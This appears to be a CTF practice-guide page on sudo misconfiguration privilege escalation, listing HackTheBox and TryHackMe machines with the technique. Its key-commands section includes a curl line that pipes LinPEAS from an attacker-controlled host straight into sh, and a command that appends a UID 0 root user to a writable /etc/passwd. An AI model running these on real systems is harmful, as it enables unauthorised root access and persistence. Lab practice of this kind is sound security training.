ZeroBox

Sudo Misconfiguration: practice machines and key commands

Running sudo -l is one of the first checks after landing a shell, because allowed commands may be a direct path to root. Entries with NOPASSWD, wildcards, environment variables kept through env_keep, or editors and interpreters that can spawn shells are the usual wins, and GTFOBins lists the exact escape for each binary. Version issues also matter, for example older sudo releases with known bypasses. A rule that allows a script to run as root is only safe if that script and every file it loads are not writable by you. Watch for sudoers.d includes and for rules tied to a specific user or host. When sudo needs a password you do not have, reuse credentials from earlier loot. The boxes below hinge on a sudo mistake.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

Sudo Privileges Inspection (`sudo -l`)

Check current user sudo permissions without or with password.

sudo -l

LinPEAS Direct Memory Execution

Download and execute LinPEAS directly in bash memory without writing to disk.

curl -L http://{LHOST}:8000/linpeas.sh | sh

Writable /etc/passwd New Root User Injection

Generate password hash and append a new user with UID 0 (root) to writable /etc/passwd.

echo "toor:$(openssl passwd -1 -salt evil Password123!):0:0:root:/root:/bin/bash" >> /etc/passwd

Keep going

Sudo Misconfiguration machines (18)

4 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 18 Linux.

Very Easy (2)

MachinePlatformOSTags
VaccineHTBLinuxFTP, SQLi, Sudo, Tar Wildcard
GuardHTBLinuxSSH, Hash Cracking, Sudo

Easy (9)

MachinePlatformOSTags
NibblesHTBLinuxExploiting-NOPASSWD, HTB
Pickle RickTHMLinuxWeb-Enumeration, Command-Injection, Sudo-Privesc
ShockerHTBLinuxExploiting-NOPASSWD, Exploiting-shellshock, HTB
CyborgTHMLinuxOSCP, Borg Backup, Hash Cracking, Sudoers
InclusionTHMLinuxLFI, Sudo
LazyAdminTHMLinuxOSCP, SweetRice CMS, MySQL Backup, Sudoers
Lian_YuTHMLinuxSteganography, Gobuster, FTP, Sudo-Privesc
SpectraHTBLinuxFile-System-Permissions, HTB, Lateral-Movement, Sudo
SundayHTBLinuxBrute-forcing-SSH, Exploiting-Sudo-NOPASSWD, HTB

Medium (4)

MachinePlatformOSTags
CanapeHTBLinuxCVE-2017-12636, Exploiting-Sudo-NOPASSWD, HTB
FluxCapacitorHTBLinuxExploiting-NOPASSWD, HTB
StratosphereHTBLinuxExploiting-Sudo-NOPASSWD, HTB, Struts
WatcherTHMLinuxLFI, FTP, Cron, Sudo-Privesc

Hard (2)

MachinePlatformOSTags
Brainpan 1THMLinuxOSCP, Buffer Overflow, Binary Exploitation, Wine
TartarusTHMLinuxFTP, Directory-Traversal, Cron, Sudo-Privesc

Insane (1)

MachinePlatformOSTags
JailHTBLinuxEnumerating-NFS-shares, Escaping-SELinux-sandbox, Escaping-rvim, Exploiting-NOPASSWD

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox